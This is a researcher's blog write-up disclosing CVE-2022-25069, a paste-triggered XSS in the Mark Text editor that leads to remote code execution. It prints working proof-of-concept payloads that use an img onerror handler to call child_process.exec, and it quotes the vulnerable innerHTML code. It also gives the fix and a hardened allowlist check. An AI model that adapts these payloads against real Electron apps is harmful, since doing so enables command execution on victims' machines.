CVE-2022-25069: Mark Text: Remote code execution through pasting content

by luiseok 2022. 3. 15.

About

Mark Text (https://marktext.app/) is a markdown editor built with Electron and Vue.js (v2.6.14). I discovered a DOM-based cross-site scripting (XSS) vulnerability in it that lets an attacker achieve remote code execution when the victim pastes a crafted payload from the clipboard.

Details

<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>

Pasted text shaped like the HTML above reaches the DOM through the code below: the function that decides how to treat clipboard content assigns the raw text to `innerHTML`, the `<img>` fails to load, and its inline `onerror` handler calls `child_process` through `require`, which is reachable from the renderer because Node integration is enabled.

 // Vulnerable version (before the fix). Called with the clipboard's text/html and text/plain parts. 
 ContentState.prototype.checkCopyType = function (html, text) { 
   let type = 'normal' 
   if (!html && text) { 
     type = 'copyAsMarkdown' 
     // Only the outermost opening and closing tag names are captured; nothing between them is inspected. 
     const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim()) 
     if (match && match[1]) { 
       const tag = match[1] 
       if (tag === 'table' && match.length === 3 && match[2] === 'table') { 
         // Try to import a single table 
         const tmp = document.createElement('table') 
         // Sink: the unsanitized clipboard text is parsed as HTML here. The <img onerror> 
         // inside the table fires even though tmp is never attached to the page. 
         tmp.innerHTML = text 
         if (tmp.childElementCount === 1) { 
           return 'htmlToMd' 
         } 
       } 
  
       // TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX. 
       type = PARAGRAPH_TYPES.find(type => type === tag) ? 'copyAsHtml' : type 
     } 
   } 
   return type 
 }


As the code shows, the only check before the paste is parsed is a regular expression that tests whether the text looks like HTML and whether its outermost tag is <table>. Nothing inspects what sits between those tags.

The check is also the sink. `tmp.innerHTML = text` hands the raw clipboard text to the HTML parser, so the `<img>` inside the table is created, fails to load its empty `src`, and runs its inline `onerror` handler even though `tmp` is never inserted into the page. The pasted HTML should have been validated against an allowlist or sanitized before being parsed, and it was not.

Because the payload can call `require`, the renderer must have had Node integration enabled, which turns an ordinary XSS into code execution with the privileges of the Mark Text process. As a result, anyone who could get the victim to paste attacker-controlled text could run arbitrary commands on the victim's computer.
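To make the gap concrete, here is an added example (written for this page, not Mark Text's own code or its fix) that reproduces the original regular-expression gate so it runs under Node without a DOM, next to a stricter allowlist check that rejects the payload before `innerHTML` is ever touched. The sample inputs, the allowlists and the `isPlainTable` / `classifyPaste` names are assumptions of this example; a production fix would normally run the DOM result through a maintained sanitizer as well, and keep Node integration off in the renderer so that an XSS cannot reach `require` at all.

```javascript
// Added example (not Mark Text's code): the regex gate from checkCopyType,
// reproduced so it runs under Node without a DOM, beside a stricter
// allowlist check that rejects the payload before innerHTML is ever touched.

// Constructed sample inputs: the PoC shape from the write-up and a benign table.
const PAYLOAD_WINDOWS =
  '<table><tr><img src onerror="require(\'child_process\').exec(\'calc.exe\')"></tr></table>';
const BENIGN_TABLE =
  '<table><thead><tr><th>name</th></tr></thead><tbody><tr><td colspan="2">x</td></tr></tbody></table>';

// Same regular expression as the vulnerable checkCopyType: it only reads the
// outermost tag names, never the content between them.
const OUTER_TAG_RE = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/;

// What the original gate decides right before it assigns text to tmp.innerHTML.
function passesOriginalGate(text) {
  const match = OUTER_TAG_RE.exec(text.trim());
  return Boolean(match && match[1] === 'table' && match[2] === 'table');
}

// Hardened gate (an assumption of this example, not the project's fix): walk
// every tag and attribute and accept only table structure with a few harmless
// attributes. Anything else, including every on* handler, fails closed.
const ALLOWED_TAGS = new Set(['table', 'caption', 'colgroup', 'col', 'thead', 'tbody', 'tfoot', 'tr', 'th', 'td']);
const ALLOWED_ATTRS = new Set(['colspan', 'rowspan', 'align']);
// A complete tag: name, zero or more attributes (bare, or quoted/unquoted value), optional "/".
const TAG_RE = /<\/?([a-zA-Z][a-zA-Z\d-]*)((?:\s+[^\s=>\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/g;
const ATTR_RE = /([^\s=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function isPlainTable(text) {
  const src = text.trim();
  if (!/^<table[\s>]/i.test(src) || !/<\/table\s*>$/i.test(src)) return false;
  // Every '<' must belong to a complete tag; a stray '<' is rejected here
  // rather than left for the HTML parser to "repair" into something else.
  if (src.replace(TAG_RE, '').includes('<')) return false;
  for (const tagMatch of src.matchAll(TAG_RE)) {
    if (!ALLOWED_TAGS.has(tagMatch[1].toLowerCase())) return false; // <img>, <script>, <svg>, ...
    for (const attr of tagMatch[2].matchAll(ATTR_RE)) {
      const name = attr[1].toLowerCase();
      const value = attr[2] ?? attr[3] ?? attr[4] ?? '';
      if (!ALLOWED_ATTRS.has(name)) return false; // onerror, onclick, style, href, ...
      if ((name === 'colspan' || name === 'rowspan') && !/^\d+$/.test(value)) return false;
      if (name === 'align' && !/^(left|center|right)$/i.test(value)) return false;
    }
  }
  return true;
}

// Replacement for the decision in checkCopyType: hand the text to the DOM only
// after the allowlist check passed, otherwise treat the clipboard as markdown text.
// (The PARAGRAPH_TYPES branch of the original is left out; it is not the issue here.)
function classifyPaste(html, text) {
  if (html || !text) return 'normal';
  return isPlainTable(text) ? 'htmlToMd' : 'copyAsMarkdown';
}

// Stand-alone demo: the original gate waves the payload through, the hardened one does not.
console.log('original gate passes payload:', passesOriginalGate(PAYLOAD_WINDOWS));
console.log('hardened gate passes payload:', isPlainTable(PAYLOAD_WINDOWS));
console.log('hardened gate passes benign table:', isPlainTable(BENIGN_TABLE));
console.log('paste classification for payload:', classifyPaste('', PAYLOAD_WINDOWS));
```

The hardened gate is deliberately stricter than a browser: an unescaped `<` in a cell, an unknown attribute, or any tag outside the table vocabulary makes it fall back to a plain-text paste instead of guessing. That is the right default for a gate whose failure mode is arbitrary script execution.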

Example

(The demonstration videos that were embedded here can no longer be played because the video hosting service has been discontinued.)

Solution

The fix is to sanitize the pasted HTML, including every child element, before it is parsed into the DOM (see the pull request in the references).

Timeline

2022-02-08 Vulnerability found and reported as an issue on Mark Text's GitHub

2022-02-10 Problem fixed, CVE ID requested

2022-03-05 CVE ID issued (CVE-2022-25069)

References

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-25069
  2. https://github.com/marktext/marktext/issues/2990
  3. https://github.com/marktext/marktext/pull/3002 

 

Footnote

This was my first experience finding an open-source vulnerability and getting a CVE ID issued. It was really thrilling and I felt a great sense of accomplishment.
I would like to express my gratitude to Oscar for giving me as much courage as possible throughout this experience.